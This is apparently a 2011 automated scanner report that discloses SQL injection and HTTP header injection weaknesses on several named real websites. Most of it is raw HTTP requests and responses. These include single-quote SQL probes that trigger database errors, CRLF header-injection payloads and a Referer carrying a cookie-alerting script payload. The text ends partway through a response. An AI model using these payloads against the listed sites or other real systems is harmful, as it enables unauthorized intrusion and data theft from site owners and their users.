SQL Injection, XSS, HTTP Header Injection, Cross Site Scripting, DORK Report, 2-28-2011

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

1.1. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /15'/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1550
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=HDMEPKABFIDKGHLDBBPEONOM; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.2. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5641
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=DEMEPKABPDKMPIFIEPHCPJCM; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.3. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1556
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=PLMEPKABHGPCPAANBPOPHCFP; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'</title>
<meta name="descri
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=CMMEPKABGNBAGHJPOIICPEAH; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.4. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/44/811103/1/attorneys/dallas.aspx

Issue detail

Request

GET /44'/811103/1/attorneys/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1423
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.5. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/44/811103/1/attorneys/dallas.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /44/811103'/1/attorneys/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5349
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.6. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/cat/44/1/37711/dallas.aspx

Issue detail

Request

GET /cat'/44/1/37711/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1399
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>37711 - DALLAS</title>
<meta name="description" content="Resu
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.7. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/cat/44/1/37711/dallas.aspx

Issue detail

Request

GET /cat/44'/1/37711/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1469
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.8. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bizfind.us
Path:	/cat/44/1/37711/dallas.aspx

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /cat/44/1/37711'/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5168
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.9. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outsourcingdotnetdevelopment.com
Path:	/xss-cross-site-scripting.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=60iqmo26d620vrg3i0e6il6a66; path=/
Connection: close
Content-Type: text/html
Content-Length: 22289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.10. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outsourcingdotnetdevelopment.com
Path:	/xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mnmaj0jl5aopvjvc4nqtmgke36; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=49tvjj99opblsv0aaq49qqbps4; path=/
Connection: close
Content-Type: text/html
Content-Length: 21434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.11. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://xhtml.co.il
Path:	/he/page-700/jQuery

Issue detail

Request

GET /he/page-700'/jQuery HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:40:12 GMT
Set-Cookie: PHPSESSID=f0d4e6f19f2bf2742863c131bd5fcd52; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1

1.12. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://xhtml.co.il
Path:	/ru/page-1013/jQuery.browser

Issue detail

Request

GET /ru/page-1013'/jQuery.browser HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:40:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Fri, 29 Apr 2011 13:40:09 GMT
Set-Cookie: PHPSESSID=2013e9889d55d51245d67f99fafde02e; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1

2. HTTP header injection previous next
There are 48 instances of this issue:

http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 2]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 3]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 4]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 2]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 3]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 4]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 2]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 3]
http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 4]
http://www.accelacomm.com/jlp/csoznee4778' [REST URL parameter 2]
http://www.csoonline.com/article/486324 [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/603308/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/626992/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/636963/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/646474/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/647171/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/647466/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/653065/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/660768/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/661718/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/663332/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/webcast/666090/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647166/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647167/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647168/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647169/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647170/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/647442/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/660813/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/660814/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/660815/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/660816/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/660817/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/661715/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/661716/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/661717/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/661813/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/661814/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/662566/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/662571/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/662587/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/663955/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/663956/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/664345/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/665713/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/666169/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/666776/ [name of an arbitrarily supplied request parameter]
http://www.csoonline.com/white-paper/666777/ [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

2.1. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 87673%0d%0a7e8e4ed489b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/87673%0d%0a7e8e4ed489b/10/50552781/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:18 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=87673
7e8e4ed489b&Source_BC=10&Script=/LP/50552781/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 440

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.2. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ae914%0d%0a68002f8ad7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/ae914%0d%0a68002f8ad7d/50552781/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:19 GMT
Server: Apache/2.2.9 (Fedora)
